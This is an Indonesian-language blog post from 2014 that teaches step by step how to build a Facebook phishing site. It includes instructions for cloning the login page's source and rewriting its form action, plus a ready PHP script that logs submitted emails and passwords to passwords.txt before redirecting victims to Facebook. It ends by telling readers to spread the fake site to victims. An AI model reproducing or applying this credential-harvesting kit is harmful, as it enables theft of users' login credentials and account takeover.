Sabtu, 13 September 2014

Cara membuat Web Phising Facebook – Pada postingan kali ini saya akan membahas tentang cara membuat web phising. walaupun ini sudah berita lama yang banyak orang sudah mengetahuinya. Tapi saya yakin masih banyak yang ingin tahu tentang cara membuat web phising seperti yang anda baca sekarang ini. Apakah anda sudah tau apa itu web phising ?? Web Phisng = WEB+ Phising.
Web  menurut saya adalah sebuah page/halaman yang berisi content yang di isi oleh admin/pemilik web, lebih lengkapnya kesini. Phising menurut dari yang saya baca yaitu berasal dari kata “Fishing” atau di bahasa Indonesia kan yang memiliki arti “memancing”. Lho kok Memancing? ternyata memang benar kita membuat web untuk memancing korban untuk masuk dalam perangkap Web Phising yang telah kita buat. Cara buatnya gimana ? Baik saya akan kasih tahu cara membuat web phising. Langkah – langkahnya sebagai berikut :
  1. Cari dan buka alamat yang mau dijadikan homepage/halaman utama Web Phising anda. misal http://www.facebook.com.
  2. Setelah halaman terbuka sepenuhnya anda tekal tombol “Ctrl + U” di keyboard secara bersamaan. Kemudian akan muncul Source Code.
  3. Copy semua Source Code tersebut. Tekan “Ctrl + A(untuk blok semua source code) kemudian tekan “Crtl + C(untuk meng-copy / menyaslin Source Code tersebut).
  4. Setelah itu buka notepad/wordpad (Start – all program – accessories- Notepad/Wordpad)  di WINDOWS atau gedit (Applications –  Accessories – Gedit Text Editor) di LINUX.
  5. Paste Source Code (ctrl + v) yang sudah di copy tadi. seperti langkah nomor 3.
  6. Cari menggunakan “Crtl + F”, isi dengan “action=(tanpa tanda petik)
  7. Ketemu
    1<form action="fb.com" method="post">
  8. Ganti fb.com” (contoh) dengan “phising.php”.
  9. Ubah “postmenjadi “GET“.
  10. Save as (file – Save as) atau tekan “Ctrl + S”. Berinama dengan “index.html” dan File Type pilih “All FIle”
  11. .Buka notepad lagi (langkah sama seperti nomor 4).
  12. Copy Paste Code PHP ini ke notepad :
    1<?php header("Location: http://fb.com"); $handle = fopen("passwords.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "rn"); } fwrite($handle, "rn"); fclose($handle); exit; ?>
  13. Ganti “http://fb.com” dengan “http://facebook.com” misal (tanpa tanda kutip).
  14. Save dengan nama phising dan extensi .php jadinya phising.php (Caranya sama seperti langkah no. 10)
  15. Upload ke hosting anda. (Silahkan cari hosting gratis atau berbayar, tidak disarankan menggunakan Hosting Gratis 000webhost untuk membuat web phising. Namun jika ingin tahu Cara Upload File di Free Hosting 000webhost silahkan baca saja. Satu lagi, pastikan domain anda sudah mengarah ke hosting anda. Jika anda tidak mengerti silahkan pelajari tentang Domain dan Hosting terlebih dahulu.
  16. Setelah ke-3 file berhasil di upload jangan lupa permission/chmod di atur 777 untuk file passwords.txt, agar password yang di ketikan oleh korban dapat tersimpan.
  17. Selesai. Silahkan Coba akes Domain anda dan apa yang anda lihat ? Jika tampilan mirip seperti halaman ketika anda membuka website yang anda tiru berarti benar.
  18. Silahkan anda test apakah WebPhising buatan anda sukses dapat menyimpan email dan password korban.
  19. Jika berhasil menyimpan informasi login korban seperti email dan password, waktunya sebarkan web phising anda dengan kecerdikan anda.
Sekian dulu postingan cara membuat web phising apabila anda masih bingung jangan malu bertanya. :D